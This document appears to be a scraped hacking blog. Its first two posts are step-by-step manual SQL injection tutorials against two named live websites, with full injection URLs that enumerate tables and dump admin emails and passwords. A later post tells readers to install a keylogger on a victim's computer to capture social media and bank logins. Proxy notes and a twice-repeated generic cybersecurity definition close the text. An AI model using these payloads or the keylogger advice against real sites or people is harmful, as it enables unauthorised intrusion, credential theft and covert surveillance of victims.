SQL INJECTION

I have vulnerable website

http://www.morephotosradio.com/transcript.php?interview_id=2021

To Check This website is vulnerable or not put ‘ sign in the end of link Like

==>http://www.morephotosradio.com/transcript.php?interview_id=2021’

The Page Will Show sqli error Like This

==> Find Number of tables by using order by –+ Query Like This

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1–+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 7–+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 15–+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 30–+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45–+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47–+  Error

==> This Error shows that the website have 46 number of tables

==> Now Remove order by and go to UNION Based In Hackbar And Click On union+all+select -statement

==>A Small Box Will OPen In that box type the number of tables like of this website is 46

==> Also Place – Sign before parameter id like this (id=-2021)

==>Press Execuate Some Numbers will be shown on page Like You Can See In The Image Above Replace any one number by group_concat(table_name) and

write from information_schema.tables where table_schema=database()–+ in the end of url

For Finding Table Information

http://www.morephotosradio.com/transcript.php?interview_id=-2021 UNION SELECT
1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+where+table_schema=database()–+

==> The Page Will Show All Table Names We Want To Hack website so we need to find admin username and password

==> Now Remove database() From The query and go to sql basics then char() and then mysqlchar a small window will open

==>In That Window Type tables like admin user member i will type user because my admin table name is user

==>Click Ok Now Replace the following things of query

group_concat(table_name) to group_concat(column_name)

table_schema to table_name

information_schema.tables to information_schema.columns

the database() is already removed and mysql char of user is placed in the place of user

==> The Query For Columns Will Become Like This

http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)–+

Press Execute

==> Now We Need Admin Email And Passwords

replace column_name with any column name you  need like email amd password and in the end of url write from user like this

http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from user–+

Press Execute

Advertisements

introduction to SQL injection-Manually Union based

Hey pen-testers, OK today in this post I am going to give a detail on one of the top-most vulnerabilities in today’s world is SQL-Injection.

For this you need a SQL-vulnerable website, Hack-bar a plugin in firefox and that’s it you can download hack-bar from here:https://addons.mozilla.org/en-us/firefox/addon/hackbar/

Ok again back to main point in this article i am using google dork” article.php?id=5″

and I got a website named :www.designsmells.com/article.php?id=5

Now to  check whether  the site is vulnerable to SQL or not we just put the ( ‘ ) without brackets to check as we get the error or not. Here lets see

http://www.designsmells.com/article.php?id=5′; —>points a error so its is clear that we are having a website with SQL injection

error

PART-2 TO GET NUMBER OF COLUMNS

In order to get the number of columns we can use any of the statements

  • ORDER BY
  • GROUP BY
  • PROCEDURE ANALYSES()

so to get the columns we try with “order by” in this with 2 negative signs in the end to make our query as a comment and to get no error while execution:”www.designsmells.com/article.php?id=5 order by 1 –” >turns to no-error

:”www.designsmells.com/article.php?id=5 order by 10 –“>turns to no-error

:”www.designsmells.com/article.php?id=5 order by 15 –” >turns to error

so the number of columns lie between 10<n<15 and keep on checking we get columns 11 as :

1

2

:”www.designsmells.com/article.php?id=5 order by 11–” > no error

then select all the statement after ?id=5 and replace it with “union select 1,2,3,4……..,11 –”

as the url turns to be

:”www.designsmells.com/article.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11– ” and hit enter

3

If there is no change then just add a ” – ” in front of ID and a ” + ” in end so the url becomes :”www.designsmells.com/article.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11–+ ” and it will dump out the vulnerable columns in order to get database we choose the number which is in “bold letters”

4

PART -3 GETTING CREDENTIALS!!

Here we replace the column number “2” with first “database()” and then “version()” to get the desired database name and version accordingly

and urls become:”www.designsmells.com/article.php?id=-5 UNION SELECT 1,database(),3,4,5,6,7,8,9,10,11–+ ”

the screenshot is there below:

5

then we go for version() check and we get:”www.designsmells.com/article.php?id=-5 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11–+ ”

5.1

Now replace the the version with “group_concat(table_name,0x0a)” and add ” from infromation_schema.tables where table_schema=database() ”

and we get the desired url as “www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()–+ ”

6

we get some of the table names and further we now add in url as:”www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_schema=database()–+”

7It will dump out the various columns out of these we focus on either named column admin:login:user etc and here we clearly get the “user_id” & “password” columns So our next step is to get data out of these two:

:”www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(user_id,0x3a,user_name,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11 from book_user–+ ” and thus we get the user id along with its password.

final

Once we found the admin pannel of website either using robots.txt or alchemist admin finder we can enter the website in a genuine way

Stay tuned guys & keep on testing 🙂

Introduction to key loggers & prevention from them

Hey there, to capture some ones key-strokes is quite possible now in order to get the access of his/her social media accounts or even worst bank credentials.

PART-1 “PREVENTION”

In order to get protection  from these type of key loggers we need to be some sort of aware and one should always & always use osk i.e Onscreen keyboard that is their in our systems and we can get them  as “windows+r” and type “osk” and hit enter as:

5

PART-2 “ATTACK BY KEY-LOGGERS”

Using:Family key-logger

Just install any of the key loggers available such as family key-logger , golden key-logger and many more from the given link as http://www.spyarsenal.com and just install it on your victim or yours too if he/she is goning to use your system.

You will see a block at the bottom right corner to confirm that your family key logger is on its work!!6Now if some one type any-thing anywhere either in the system or in browser their key-strokes will be captured and you can view them anytime.

Some key loggers also provide the remote access and e-mail facility of sending you the log details.

Proxy

proxy-server_3

Computer security, also known as cybersecurity or IT security, is security applied to computing devices such as computers and smartphones, as well as to both private and public computer networks, including the whole Internet. The field includes all the processes and mechanisms by which digital equipment, information and services are protected from unintended or unauthorized access, change or destruction, and is of growing importance due to the increasing reliance of computer systems in most societies. It includes physical security to prevent theft of equipment and information security to protect the data on that equipment. Those terms generally do not refer to physical security, but a common belief among computer security experts is that a physical security breach is one of the worst kinds of security breaches as it generally allows full access to both data and equipment.

Cybersecurity is the process of applying security measures to ensure confidentiality, integrity, and availability of data. Cybersecurity attempts to assure the protection of assets, which includes data, desktops, servers, buildings, and most importantly, humans. The goal of cybersecurity is to protect data both in transit and at rest. Countermeasures can be put in place in order to increase the security of data. Some of these measures include, but are not limited to, access control, awareness training, audit and accountability, risk assessment, penetration testing, vulnerability management, and security assessment and authorization.

Types of proxy–

  • Application based
  • Browser based
  • Web based
  1. Application based– In application based proxy we work on application software like ultrasurf to applied dummy ure identity.following picture shows the working of ultrasurf

To download this click on this link http://ultrasurf.us/download/u.zip

ultra surf

2. Browser Based proxy– Browser based proxy works in browser like add-ons inbrowser like mozilla firefox and goggle chrome.for example anonymox add on in mozilla is showing below-

Capture 7

3.Web based proxy– web based proxy works on web pages to apply proxy on search via serching engines for example http://www.kproxy.com

kproxy

Cyber Security

CyberSecurity

Computer security, also known as cybersecurity or IT security, is security applied to computing devices such as computers and smartphones, as well as to both private and public computer networks, including the whole Internet. The field includes all the processes and mechanisms by which digital equipment, information and services are protected from unintended or unauthorized access, change or destruction, and is of growing importance due to the increasing reliance of computer systems in most societies. It includes physical security to prevent theft of equipment and information security to protect the data on that equipment. Those terms generally do not refer to physical security, but a common belief among computer security experts is that a physical security breach is one of the worst kinds of security breaches as it generally allows full access to both data and equipment.

Cybersecurity is the process of applying security measures to ensure confidentiality, integrity, and availability of data. Cybersecurity attempts to assure the protection of assets, which includes data, desktops, servers, buildings, and most importantly, humans. The goal of cybersecurity is to protect data both in transit and at rest. Countermeasures can be put in place in order to increase the security of data. Some of these measures include, but are not limited to, access control, awareness training, audit and accountability, risk assessment, penetration testing, vulnerability management, and security assessment and authorization.